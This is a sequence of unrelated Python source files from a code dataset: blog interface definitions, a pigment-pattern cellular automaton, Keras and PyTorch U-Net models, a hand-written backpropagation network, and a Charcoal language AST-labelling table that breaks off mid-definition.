class IBlogPostView(interface.Interface):
""" Blog post view """
class IYear(IContent):
""" interface for year """
class IMonth(IContent):
""" interface for month """
class IBlogTags(interface.Interface):
""" blog tags """
engine = interface.Attribute('Tags engine')
def hasTag(tag):
""" """
def listTags(post):
"""Return list of tags"""
class IBlogTagsManager(interface.Interface):
""" manage blog tags """
def update(post):
"""Update tags for post."""
def remove(post):
"""Remove tags for post."""
class IBloggerWorkspace(IBlog, IWorkspace):
""" blogger workspace """
class IBloggerWorkspaceFactory(IWorkspaceFactory):
""" blogger workspace factory """
class ISpaceBloggerWorkspaceFactory(IBloggerWorkspaceFactory):
""" blogger workspace factory """
class IBlogPostsRSSFeed(IRSS2Feed):
""" blog posts rss feed """
class IBlogNotification(IContentNotification):
""" blog notification """
class IBloggerPermissions(IPermissionCategory):
""" blog permissions """
class IBlogPostPage(interface.Interface):
title = interface.Attribute("Object's Title")
text = RichText(
title=_(u'Text'),
description=_(u'Blog post body text.'),
required=False)
position = schema.TextLine(
title=_(u'Position'),
required=False)
class IAdvancedBlogPost(IBlogPost):
""" Advanced Blog post """
text = interface.Attribute("Object's Text")
pages = schema.List(
title=_(u"Pages"),
value_type=schema.Object(
title=_(u'page'),
schema=IBlogPostPage),
default=[],
required=True) | src/zojax/blogger/interfaces.py | 0.603114 | 0.148541 |
from datetime import datetime
import numpy as np
import matplotlib.pyplot as plt
import math
import random
from initialize import initcond, neighbors
def sim_parameters():
"""This function defines the initial parameters used in simulations"""
global rows, cols, h, per_cycle, num_cycles
rows = 100
cols = 100
h = 15
per_cycle = 10**7
num_cycles = 10**2
def reaction_rates():
"""This function defines the reaction rates for each process"""
global bx, bm, dx, dm, sm, sx, lx
    bx = 1    # birth of xanthophores
    bm = 0    # birth of melanophores
    dx = 0    # death of xanthophores
    dm = 0    # death of melanophores
    sm = 1    # short-range killing of a xanthophore by a melanophore
    sx = 1    # short-range killing of a melanophore by a xanthophore
    lx = 2.5  # long-range activation/birth strength
return
def sim_setup(row=100, col=100):
"""This function sets up the initial simulations, calling initial conditions and neighbors"""
array, irid = initcond.basic(row, col)
up, down, left, right = neighbors.calc4neighbors(row, col)
return array, irid, up, down, left, right
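# Note on the neighbor tables returned by sim_setup: the indexing below
# suggests that up/down map each cell to the row index of its vertical
# neighbor and left/right to the column index of its horizontal neighbor,
# presumably precomputed with wraparound by initialize.neighbors (an
# assumption; that module is not shown here).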
def run_sim(array, irid, up, down, left, right, h=15, num_loops=10**2, per_loop=10**7):
"""This function runs the simulations and outputs the final matrix"""
total = bx + bm + dx + dm + sm + sx + lx
P_bx = bx/total
P_bm = bm/total
P_dx = dx/total
P_dm = dm/total
P_sm = sm/total
P_sx = sx/total
P_lx = lx/total
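    # The normalized rates partition [0, 1): drawing pn uniformly and testing
    # it against the cumulative thresholds below (long-range birth, then
    # short-range killing, births, deaths) picks one event per iteration with
    # probability proportional to its rate -- a discrete Gillespie-style
    # event selection.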
for loop in range(num_loops):
idx0 = np.random.randint(low=0, high=rows, size=per_loop, dtype=np.uint8)
idx1 = np.random.randint(low=0, high=cols, size=per_loop, dtype=np.uint8)
process = np.random.rand(per_loop)
for n in range(per_loop):
pn = process[n]
location = (idx0[n], idx1[n])
well = array[location]
if pn < P_lx:
if (well == 0) & (~ irid[location]):
angle = random.random() * 2 * math.pi
cosangle = math.cos(angle)
sinangle = math.sin(angle)
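                    # jump a distance h in a uniformly random direction; the
                    # modulo below wraps indices, making the lattice a torus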
i_new = np.around(location[0] + cosangle * h, decimals=0) % array.shape[0]
j_new = np.around(location[1] + sinangle * h, decimals=0) % array.shape[1]
                    if array[int(i_new), int(j_new)] == 1:
                        array[location] = 2  # a xanthophore at distance h promotes melanophore birth here
elif pn < P_lx + P_sx:
if (well == 2):
neigh = ['u', 'd', 'l', 'r']
choice = random.choice(neigh)
if choice == 'u': # chooses neighboring value
neigh_val = array[up[location], location[1]]
elif choice == 'd':
neigh_val = array[down[location], location[1]]
elif choice == 'l':
neigh_val = array[location[0], left[location]]
else:
neigh_val = array[location[0], right[location]]
if neigh_val == 1:
array[location] = 0 # kills melanophore
elif pn < P_lx + P_sx + P_sm:
if (well == 1):
neigh = ['u', 'd', 'l', 'r']
choice = random.choice(neigh)
if choice == 'u': # chooses neighboring value
neigh_val = array[up[location], location[1]]
elif choice == 'd':
neigh_val = array[down[location], location[1]]
elif choice == 'l':
neigh_val = array[location[0], left[location]]
else:
neigh_val = array[location[0], right[location]]
if neigh_val == 2:
                        array[location] = 0  # kills xanthophore
elif pn < P_lx + P_sx + P_sm + P_bx:
if well == 0:
                    array[location] = 1  # births a xanthophore
elif pn < P_lx + P_sx + P_sm + P_bx + P_bm:
if well == 0:
array[location] = 2 # births melanophore
elif pn < P_lx + P_sx + P_sm + P_bx + P_bm + P_dx:
if well == 1:
                    array[location] = 0  # xanthophore dies
elif pn < P_lx + P_sx + P_sm + P_bx + P_bm + P_dx + P_dm:
if well == 2:
                    array[location] = 0  # melanophore dies
return array
def plotter(array):
"""This function plots the arrays in a similar manner to the original paper:
    Yellow pixels are xanthophores
Black pixels are melanophores
White pixels are empty
"""
img = np.empty((array.shape[0], array.shape[1], 3), dtype=np.float32)
img[array == 0, :] = [1, 1, 1] # sets empty cells to white
img[array == 2, :] = [0, 0, 0] # sets melanophores to black
    img[array == 1, :] = [1, 1, 0]  # sets xanthophores to yellow
return img
if __name__ == '__main__':
startTime = datetime.now()
sim_parameters()
reaction_rates()
array, irid, up, down, left, right = sim_setup(rows, cols)
final = run_sim(array, irid, up, down, left, right)
image = plotter(final)
print(datetime.now()-startTime)
plt.imshow(image)
plt.show() | fastdifgrow/fastdifgrow_main.py | 0.581422 | 0.602442 |
import torch
import torch.nn as nn
import torch.nn.functional as F
import keras
from keras import backend as K
from keras.models import Input, Model
from keras.layers import Conv2D, MaxPooling2D
from keras.layers import Conv2DTranspose, concatenate
K.set_image_data_format('channels_first')
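# 'channels_first' gives NCHW tensors, the same layout PyTorch uses, so the
# Keras and PyTorch models below line up layer-for-layer.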
# From https://github.com/jocicmarko/ultrasound-nerve-segmentation
def unet_keras(input_size=224):
inputs = Input((1, input_size, input_size))
conv1 = Conv2D(32, (3, 3), activation='relu', padding='same',
name='conv_block1_32.conv')(inputs)
conv1 = Conv2D(32, (3, 3), activation='relu', padding='same',
name='conv_block1_32.conv2')(conv1)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(64, (3, 3), activation='relu', padding='same',
name='conv_block32_64.conv')(pool1)
conv2 = Conv2D(64, (3, 3), activation='relu', padding='same',
name='conv_block32_64.conv2')(conv2)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(128, (3, 3), activation='relu', padding='same',
name='conv_block64_128.conv')(pool2)
conv3 = Conv2D(128, (3, 3), activation='relu', padding='same',
name='conv_block64_128.conv2')(conv3)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(256, (3, 3), activation='relu', padding='same',
name='conv_block128_256.conv')(pool3)
conv4 = Conv2D(256, (3, 3), activation='relu', padding='same',
name='conv_block128_256.conv2')(conv4)
pool4 = MaxPooling2D(pool_size=(2, 2))(conv4)
conv5 = Conv2D(512, (3, 3), activation='relu', padding='same',
name='conv_block256_512.conv')(pool4)
conv5 = Conv2D(512, (3, 3), activation='relu', padding='same',
name='conv_block256_512.conv2')(conv5)
up6 = concatenate([Conv2DTranspose(256, (2, 2), strides=(2, 2),
padding='valid',
name='up_block512_256.up')(conv5),
conv4], axis=1)
conv6 = Conv2D(256, (3, 3), activation='relu',
padding='same', name='up_block512_256.conv')(up6)
conv6 = Conv2D(256, (3, 3), activation='relu', padding='same',
name='up_block512_256.conv2')(conv6)
up7 = concatenate([Conv2DTranspose(128, (2, 2), strides=(2, 2),
padding='valid',
name='up_block256_128.up')(conv6),
conv3], axis=1)
conv7 = Conv2D(128, (3, 3), activation='relu',
padding='same', name='up_block256_128.conv')(up7)
conv7 = Conv2D(128, (3, 3), activation='relu', padding='same',
name='up_block256_128.conv2')(conv7)
up8 = concatenate([Conv2DTranspose(64, (2, 2), strides=(2, 2),
padding='valid',
name='up_block128_64.up')(conv7),
conv2], axis=1)
conv8 = Conv2D(64, (3, 3), activation='relu',
padding='same', name='up_block128_64.conv')(up8)
conv8 = Conv2D(64, (3, 3), activation='relu', padding='same',
name='up_block128_64.conv2')(conv8)
up9 = concatenate([Conv2DTranspose(32, (2, 2), strides=(2, 2),
padding='valid',
name='up_block64_32.up')(conv8),
conv1], axis=1)
conv9 = Conv2D(32, (3, 3), activation='relu',
padding='same', name='up_block64_32.conv')(up9)
conv9 = Conv2D(32, (3, 3), activation='relu', padding='same',
name='up_block64_32.conv2')(conv9)
conv10 = Conv2D(2, (1, 1), activation=None, name='last')(conv9)
model = Model(inputs=[inputs], outputs=[conv10])
model.compile(optimizer=keras.optimizers.SGD(),
loss=keras.losses.categorical_crossentropy)
return model
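# PyTorch mirror of the Keras U-Net above. The attribute names
# (conv_block1_32, up_block512_256, ..., last) line up with the Keras layer
# name prefixes, which is what allows weights to be mapped between the two
# models.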
class UNetConvBlock(nn.Module):
def __init__(self, in_size, out_size, kernel_size=3, activation=F.relu):
super(UNetConvBlock, self).__init__()
self.conv = nn.Conv2d(in_size, out_size, kernel_size, padding=1)
self.conv2 = nn.Conv2d(out_size, out_size, kernel_size, padding=1)
self.activation = activation
def forward(self, x):
out = self.activation(self.conv(x))
out = self.activation(self.conv2(out))
return out
class UNetUpBlock(nn.Module):
def __init__(self, in_size, out_size, kernel_size=3,
activation=F.relu, space_dropout=False):
super(UNetUpBlock, self).__init__()
self.up = nn.ConvTranspose2d(in_size, out_size, 2, stride=2)
self.conv = nn.Conv2d(in_size, out_size, kernel_size, padding=1)
self.conv2 = nn.Conv2d(out_size, out_size, kernel_size, padding=1)
self.activation = activation
def center_crop(self, layer, target_size):
batch_size, n_channels, layer_width, layer_height = layer.size()
xy1 = (layer_width - target_size) // 2
return layer[:, :, xy1:(xy1 + target_size), xy1:(xy1 + target_size)]
def forward(self, x, bridge):
up = self.up(x)
crop1 = self.center_crop(bridge, up.size()[2])
out = torch.cat([up, crop1], 1)
out = self.activation(self.conv(out))
out = self.activation(self.conv2(out))
return out
class UNetPytorch(nn.Module):
def __init__(self):
super(UNetPytorch, self).__init__()
self.activation = F.relu
self.pool1 = nn.MaxPool2d(2)
self.pool2 = nn.MaxPool2d(2)
self.pool3 = nn.MaxPool2d(2)
self.pool4 = nn.MaxPool2d(2)
self.conv_block1_32 = UNetConvBlock(1, 32)
self.conv_block32_64 = UNetConvBlock(32, 64)
self.conv_block64_128 = UNetConvBlock(64, 128)
self.conv_block128_256 = UNetConvBlock(128, 256)
self.conv_block256_512 = UNetConvBlock(256, 512)
self.up_block512_256 = UNetUpBlock(512, 256)
self.up_block256_128 = UNetUpBlock(256, 128)
self.up_block128_64 = UNetUpBlock(128, 64)
self.up_block64_32 = UNetUpBlock(64, 32)
self.last = nn.Conv2d(32, 2, 1)
def forward(self, x):
block1 = self.conv_block1_32(x)
pool1 = self.pool1(block1)
block2 = self.conv_block32_64(pool1)
pool2 = self.pool2(block2)
block3 = self.conv_block64_128(pool2)
pool3 = self.pool3(block3)
block4 = self.conv_block128_256(pool3)
pool4 = self.pool4(block4)
block5 = self.conv_block256_512(pool4)
up1 = self.up_block512_256(block5, block4)
up2 = self.up_block256_128(up1, block3)
up3 = self.up_block128_64(up2, block2)
up4 = self.up_block64_32(up3, block1)
return self.last(up4)
if __name__ == "__main__":
net = UNetPytorch() | nn_transfer/test/architectures/unet.py | 0.951605 | 0.713694 |
import random
import math
class NeuralNetwork:
learning_rate = 0.5
def __init__(self,input_num,hidden_num,output_num,input_hidden_weights=None,
input_hidden_bias=None,hidden_output_weights=None,hidden_output_bias=None):
self.input_num = input_num
        # build the hidden layer
        self.hidden_layer = NeuralLayer(hidden_num, input_hidden_bias)
        # build the output layer
        self.output_layer = NeuralLayer(output_num, hidden_output_bias)
        # initialize input-to-hidden weights
        self.init_input_to_hidden_weights(input_hidden_weights)
        # initialize hidden-to-output weights
        self.init_hidden_to_output_weights(hidden_output_weights)
def init_input_to_hidden_weights(self,weights):
weight_num = 0
for i_num in range(len(self.hidden_layer.neurons)):
for o_num in range(self.input_num):
if weights is None:
self.hidden_layer.neurons[i_num].weights.append(random.random())
else:
self.hidden_layer.neurons[i_num].weights.append(weights[weight_num])
weight_num += 1
def init_hidden_to_output_weights(self,weights):
weight_num = 0
for i_num in range(len(self.output_layer.neurons)):
for o_num in range(len(self.hidden_layer.neurons)):
if weights is None:
self.output_layer.neurons[i_num].weights.append(random.random())
else:
self.output_layer.neurons[i_num].weights.append(weights[weight_num])
weight_num += 1
def inspect(self):
print('..................')
        print('input num:', self.input_num)  # the network stores no input vector itself
print('..................')
print('hidden inspect:')
self.hidden_layer.inspect()
print('..................')
print('output inspect:')
self.output_layer.inspect()
print('..................')
    def forward(self, inputs):
        hidden_layer_output = self.hidden_layer.forward(inputs)
        print('hidden_layer_output', hidden_layer_output)
        output_layer_output = self.output_layer.forward(hidden_layer_output)
        print('output_layer_output', output_layer_output)
        return output_layer_output
    def train(self, x, y):
        self.forward(x)  # forward pass; each neuron caches its inputs and output
        # partial derivative of the total error w.r.t. each output neuron's net input: dE/dnet_o
        total_o_pd = [0] * len(self.output_layer.neurons)
        for o in range(len(self.output_layer.neurons)):
            total_o_pd[o] = self.output_layer.neurons[o].calculate_total_net_pd(y[o])
        # partial derivative of the total error w.r.t. each hidden neuron's net input:
        # dE/dnet_h = (sum over outputs of dE/dnet_o * w_ho) * dout_h/dnet_h
        total_neth_pd = [0] * len(self.hidden_layer.neurons)
        for h in range(len(self.hidden_layer.neurons)):
            total_h_pd = 0
            for o in range(len(self.output_layer.neurons)):
                # the hidden->output weight w_ho is stored on the output neuron, at index h
                total_h_pd += total_o_pd[o] * self.output_layer.neurons[o].weights[h]
            total_neth_pd[h] = total_h_pd * self.hidden_layer.neurons[h].calculate_output_net_pd()
        # update hidden-to-output weights
        for o in range(len(self.output_layer.neurons)):
            for ho_w in range(len(self.output_layer.neurons[o].weights)):
                ho_w_gradient = total_o_pd[o] * self.output_layer.neurons[o].calculate_net_linear_pd(ho_w)
                self.output_layer.neurons[o].weights[ho_w] -= self.learning_rate * ho_w_gradient
        # update input-to-hidden weights
        for h in range(len(self.hidden_layer.neurons)):
            for ih_w in range(len(self.hidden_layer.neurons[h].weights)):
                ih_w_gradient = total_neth_pd[h] * self.hidden_layer.neurons[h].calculate_net_linear_pd(ih_w)
                self.hidden_layer.neurons[h].weights[ih_w] -= self.learning_rate * ih_w_gradient
def calculate_total_error(self, training_sets):
total_error = 0
for t in range(len(training_sets)):
training_inputs, training_outputs = training_sets[t]
self.forward(training_inputs)
for o in range(len(training_outputs)):
total_error += self.output_layer.neurons[o].calculate_error(training_outputs[o])
return total_error
class NeuralLayer:
def __init__(self,neural_num,bias):
        self.bias = bias if bias is not None else random.random()  # a bias of 0 is a valid value
self.neurons = []
for i in range(neural_num):
self.neurons.append(Neuron(self.bias))
def inspect(self):
print('weights:',[neuron.weights for neuron in self.neurons])
print('bias:',[neuron.bias for neuron in self.neurons])
def get_output(self,inputs):
outputs = []
for neuron in self.neurons:
outputs.append(neuron.output)
return outputs
def forward(self,inputs):
outputs = []
for neuron in self.neurons:
outputs.append(neuron.calculate_output(inputs))
return outputs
class Neuron:
def __init__(self,bias):
self.bias = bias
self.weights = []
def calculate_output(self,inputs):
self.inputs = inputs
total_net_outputs = self.calculate_total_net_output()
self.output = self.sigmoid(total_net_outputs)
return self.output
def calculate_total_net_output(self):
total = 0
for i in range(len(self.inputs)):
total += self.inputs[i] * self.weights[i]
return total + self.bias
def sigmoid(self,total_net_input):
return 1 / (1 + math.exp(-total_net_input))
def calculate_total_output_pd(self,total_output):
return -(total_output - self.output)
def calculate_output_net_pd(self):
return self.output * (1 - self.output)
def calculate_total_net_pd(self,total_output):
return self.calculate_total_output_pd(total_output) * self.calculate_output_net_pd()
def calculate_net_linear_pd(self,index):
return self.inputs[index]
def calculate_error(self, target_output):
return 0.5 * (target_output - self.output) ** 2
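# The fixed weights and the single (inputs, targets) pair below appear to
# follow the well-known step-by-step backpropagation worked example for a
# 2-2-2 network; over the 10000 iterations the printed total error should
# shrink steadily toward zero.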
nn = NeuralNetwork(2, 2, 2, input_hidden_weights=[0.15, 0.2, 0.25, 0.3], input_hidden_bias=0.35,
hidden_output_weights=[0.4, 0.45, 0.5, 0.55], hidden_output_bias=0.6)
for i in range(10000):
nn.train([0.05, 0.1], [0.01, 0.99])
print(i+1, round(nn.calculate_total_error([[[0.05, 0.1], [0.01, 0.99]]]), 9)) | bpnn/ref_code/nn.py | 0.388966 | 0.290138 |
from charcoaltoken import CharcoalToken as CT
from unicodegrammars import UnicodeGrammars
def PassThrough(r):
return r
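# Pick n Greek letters not already used in s, to serve as fresh loop/index
# variable names in the verbose AST labels.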
def GetFreeVariable(s, n=1):
r = ""
for _ in range(n):
r += next(filter(lambda c: c not in s + r, "ικλμνξπρςστυφχψωαβγδεζηθ"))
return r
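# Map a Greek variable name to its ASCII mnemonic (e.g. ι -> i, κ -> k).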
def VerbosifyVariable(c):
return "iklmnxprsvtufcywabgdezhq"["ικλμνξπρςστυφχψωαβγδεζηθ".find(c)]
def EvaluateFunctionOrList(f, s):
if isinstance(f, list):
return f[0](s)
return f(s)
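# ASTProcessor maps each CharcoalToken to a list of handlers, one handler per
# alternative of that token in UnicodeGrammars. A handler receives the parsed
# children r and returns a one-element list holding a closure; calling the
# closure with the string s of Greek variables already in scope produces a
# nested list of human-readable labels for the AST.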
ASTProcessor = {
CT.Arrow: [
lambda r: [lambda s="": [r[0] + ": Left"]],
lambda r: [lambda s="": [r[0] + ": Up"]],
lambda r: [lambda s="": [r[0] + ": Right"]],
lambda r: [lambda s="": [r[0] + ": Down"]],
lambda r: [lambda s="": [r[0] + ": Up Left"]],
lambda r: [lambda s="": [r[0] + ": Up Right"]],
lambda r: [lambda s="": [r[0] + ": Down Right"]],
lambda r: [lambda s="": [r[0] + ": Down Left"]],
lambda r: [lambda s="": [r[0] + ": Direction", r[1][0](s)]]
],
CT.Multidirectional: [
lambda r: [lambda s="": ["Multidirectional"] + r[0][0](s)[1:] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, down, left, up"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down right, down left, up left, up right, "] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, down right, down, down left, left, up left, up, up right, "] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down, up"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down right, up left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down left, up right"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down right, up right"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down left, up left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down right, down left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down right, down, up, up right"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, up"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, down, left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Up left, up right"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down, up left, up right"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down left, left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down, left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, up"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, down"] + r[1][0](s)[1:]],
lambda r: [lambda s="": r[1][0](s)],
lambda r: [lambda s="": r[1][0](s)],
lambda r: [lambda s="": r[1][0](s)],
lambda r: [lambda s="": ["Multidirectional"]]
],
CT.Side: [lambda r: [lambda s="": ["Side"] + [el[0](s) for el in r]]],
CT.String: [
lambda r: [lambda s="": [repr(r[0]) + ": String %s" % repr(r[0])]]
],
CT.Number: [
lambda r: [lambda s="": [str(r[0]) + ": Number %s" % str(r[0])]]
],
CT.Name: [lambda r: [lambda s="": [r[0] + ": Identifier %s (%s)" % (str(r[0]), VerbosifyVariable(str(r[0])))]]],
CT.S: [lambda r: [lambda s="": []]] * 2,
CT.Span: [
lambda r: [lambda s="": [
"Span", ["Start", r[0][0](s)], ["Stop", r[2][0](s)], ["Step", r[4][0](s)]
]],
lambda r: [lambda s="": ["Span", ["Start", r[0][0](s)], ["Step", r[3][0](s)]]],
lambda r: [lambda s="": ["Span", ["Start", r[0][0](s)], ["Stop", r[2][0](s)]]],
lambda r: [lambda s="": ["Span", ["Start", r[0][0](s)]]],
lambda r: [lambda s="": ["Span", ["Stop", r[1][0](s)], ["Step", r[3][0](s)]]],
lambda r: [lambda s="": ["Span", ["Stop", r[1][0](s)]]],
lambda r: [lambda s="": ["Span", ["Step", r[2][0](s)]]],
lambda r: [lambda s="": ["Span"]]
],
CT.Arrows: [
lambda r: [lambda s="": ["Arrows", r[0][0](s)] + r[1][0](s)[1:]],
lambda r: [lambda s="": ["Arrows", r[0][0](s)]]
],
CT.Sides: [
lambda r: [lambda s="": ["Sides", r[0][0](s)] + r[1][0](s)[1:]],
lambda r: [lambda s="": ["Sides", r[0][0](s)]]
],
CT.Expressions: [
lambda r: [lambda s="": ["Expressions", r[0][0](s)] + r[1][0](s)[1:]],
lambda r: [lambda s="": ["Expressions", r[0][0](s)]]
],
CT.WolframExpressions: [
lambda r: [lambda s="": ["Wolfram Expressions", r[0][0](s)[0](s)] + [el[0](s) for el in r[1][0](s)[1:]]],
lambda r: [lambda s="": ["Wolfram Expressions", r[0][0](s)]]
],
CT.PairExpressions: [
lambda r: [lambda s="": ["Pair Expressions", ["Pair", r[0][0](s), r[1][0](s)]] + r[2][0](s)[1:]],
lambda r: [lambda s="": ["Pair Expressions", ["Pair", r[0][0](s), r[1][0](s)]]]
],
CT.Cases: [
lambda r: [lambda s="": ["Cases", ["Case", r[0][0](s), r[1][0](s)]] + r[2][0](s)[1:]],
lambda r: [lambda s="": ["Cases"]]
],
CT.List: [
lambda r: [lambda s="": ["List"] + r[1][0](s)[1:]],
lambda r: [lambda s="": ["List"]]
] * 2,
CT.WolframList: [
lambda r: [lambda s="": ["Wolfram List"] + r[1][0](s)[1:]],
lambda r: [lambda s="": ["Wolfram List"]]
] * 2,
CT.Dictionary: [
lambda r: [lambda s="": ["Dictionary"] + r[1][0](s)[1:]],
lambda r: [lambda s="": ["Dictionary"]]
] * 2,
CT.WolframExpression: [
lambda r: [lambda s="": r[0]],
lambda r: [lambda s="": r[0]]
],
CT.Expression: [
lambda r: [lambda s="": r[0](s)],
lambda r: [lambda s="": r[0](s)],
lambda r: [lambda s="": r[0](s)],
lambda r: [lambda s="": r[0][0](s)],
lambda r: [lambda s="": r[1][0](s)],
lambda r: [lambda s="": r[1][0](s)],
lambda r: [lambda s="": r[0][0](s)],
lambda r: [lambda s="": r[1][0]()],
lambda r: [lambda s="": r[1][0]()],
lambda r: [lambda s="": r[0][0](s)]
] + [
lambda r: [lambda s="": [el[0](s) for el in r[:-1]]]
] * 17,
CT.ExpressionOrEOF: [
lambda r: [lambda s="": r[0]],
lambda r: [lambda s="": [": Input"]]
],
CT.Nilary: [
lambda r: [lambda s="": r[0] + ": Input string"],
lambda r: [lambda s="": r[0] + ": Input number"],
lambda r: [lambda s="": r[0] + ": Input"],
lambda r: [lambda s="": r[0] + ": Random"],
lambda r: [lambda s="": r[0] + ": Peek all"],
lambda r: [lambda s="": r[0] + ": Peek Moore"],
lambda r: [lambda s="": r[0] + ": Peek Von Neumann"],
lambda r: [lambda s="": r[0] + ": Peek"],
lambda r: [lambda s="": r[0] + ": x position"],
lambda r: [lambda s="": r[0] + ": y position"]
],
CT.Unary: [
lambda r: [lambda s="": r[0] + ": Negative"],
lambda r: [lambda s="": r[0] + ": Length"],
lambda r: [lambda s="": r[0] + ": Not"],
lambda r: [lambda s="": r[0] + ": Cast"],
lambda r: [lambda s="": r[0] + ": Random"],
lambda r: [lambda s="": r[0] + ": Evaluate"],
lambda r: [lambda s="": r[0] + ": Pop"],
lambda r: [lambda s="": r[0] + ": To lowercase"],
lambda r: [lambda s="": r[0] + ": To uppercase"],
lambda r: [lambda s="": r[0] + ": Minimum"],
lambda r: [lambda s="": r[0] + ": Maximum"],
lambda r: [lambda s="": r[0] + ": Character/Ordinal"],
lambda r: [lambda s="": r[0] + ": Reverse"],
lambda r: [lambda s="": r[0] + ": Get variable"],
lambda r: [lambda s="": r[0] + ": Repeated"],
lambda r: [lambda s="": r[0] + ": Repeated null"],
lambda r: [lambda s="": r[0] + ": Slice"],
lambda r: [lambda s="": r[0] + ": Inclusive range"],
lambda r: [lambda s="": r[0] + ": Range"],
lambda r: [lambda s="": r[0] + ": Not"],
lambda r: [lambda s="": r[0] + ": Absolute value"],
lambda r: [lambda s="": r[0] + ": Sum"],
lambda r: [lambda s="": r[0] + ": Product"],
lambda r: [lambda s="": r[0] + ": Incremented"],
lambda r: [lambda s="": r[0] + ": Decremented"],
lambda r: [lambda s="": r[0] + ": Doubled"],
lambda r: [lambda s="": r[0] + ": Halved"],
lambda r: [lambda s="": r[0] + ": eval"],
lambda r: [lambda s="": r[0] + ": Square root"]
],
CT.Binary: [
lambda r: [lambda s="": r[0] + ": Sum"],
lambda r: [lambda s="": r[0] + ": Difference"],
lambda r: [lambda s="": r[0] + ": Product"],
lambda r: [lambda s="": r[0] + ": Integer quotient"],
lambda r: [lambda s="": r[0] + ": Quotient"],
lambda r: [lambda s="": r[0] + ": Modulo"],
lambda r: [lambda s="": r[0] + ": Equals"],
lambda r: [lambda s="": r[0] + ": Less than"],
lambda r: [lambda s="": r[0] + ": Greater than"],
lambda r: [lambda s="": r[0] + ": Bitwise and"],
lambda r: [lambda s="": r[0] + ": Bitwise or"],
lambda r: [lambda s="": r[0] + ": Inclusive range"],
lambda r: [lambda s="": r[0] + ": Mold"],
lambda r: [lambda s="": r[0] + ": Exponentiate"],
lambda r: [lambda s="": r[0] + ": At index"],
lambda r: [lambda s="": r[0] + ": Push"],
lambda r: [lambda s="": r[0] + ": Join"],
lambda r: [lambda s="": r[0] + ": Split"],
lambda r: [lambda s="": r[0] + ": Find all"],
lambda r: [lambda s="": r[0] + ": Find"],
lambda r: [lambda s="": r[0] + ": Pad left"],
lambda r: [lambda s="": r[0] + ": Pad right"],
lambda r: [lambda s="": r[0] + ": Count"],
lambda r: [lambda s="": r[0] + ": Rule"],
lambda r: [lambda s="": r[0] + ": Delayed rule"],
lambda r: [lambda s="": r[0] + ": Pattern test"],
lambda r: [lambda s="": r[0] + ": Slice"],
lambda r: [lambda s="": r[0] + ": All"],
lambda r: [lambda s="": r[0] + ": Any"]
],
CT.Ternary: [lambda r: [lambda s="": r[0] + ": Slice"]],
CT.Quarternary: [lambda r: [lambda s="": r[0] + ": Slice"]],
CT.LazyUnary: [],
CT.LazyBinary: [
lambda r: [lambda s="": r[0] + ": And"],
lambda r: [lambda s="": r[0] + ": Or"]
],
CT.LazyTernary: [lambda r: [lambda s="": r[0] + ": Ternary"]],
CT.LazyQuarternary: [],
CT.OtherOperator: [
lambda r: [lambda s="": [r[0] + ": Peek direction"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": (lambda t: [r[0] + ": Map (loop variable %s (%s), index variable %s (%s))" % (t[-2], VerbosifyVariable(t[-2]), t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s, 2))],
lambda r: [lambda s="": (lambda t: [r[0] + ": String map (loop variable %s (%s), index variable %s (%s))" % (t[-2], VerbosifyVariable(t[-2]), t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s, 2))],
lambda r: [lambda s="": (lambda t: [r[0] + ": Any (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s))],
lambda r: [lambda s="": (lambda t: [r[0] + ": All (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s))],
lambda r: [lambda s="": (lambda t: [r[0] + ": Filter (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s))],
lambda r: [lambda s="": [r[0] + ": Evaluate variable"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Evaluate variable"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Evaluate variable"] + [el[0](s) for el in r[1:]]]
],
CT.Program: [
lambda r: [lambda s="": [r[2][0](s)[0], r[0][0](s)] + r[2][0](s)[1:]],
lambda r: [lambda s="": ["Program"]]
],
CT.Body: [
lambda r: [lambda s="": r[1]],
lambda r: [lambda s="": r[1]],
lambda r: [lambda s="": r[0]]
],
CT.Command: [
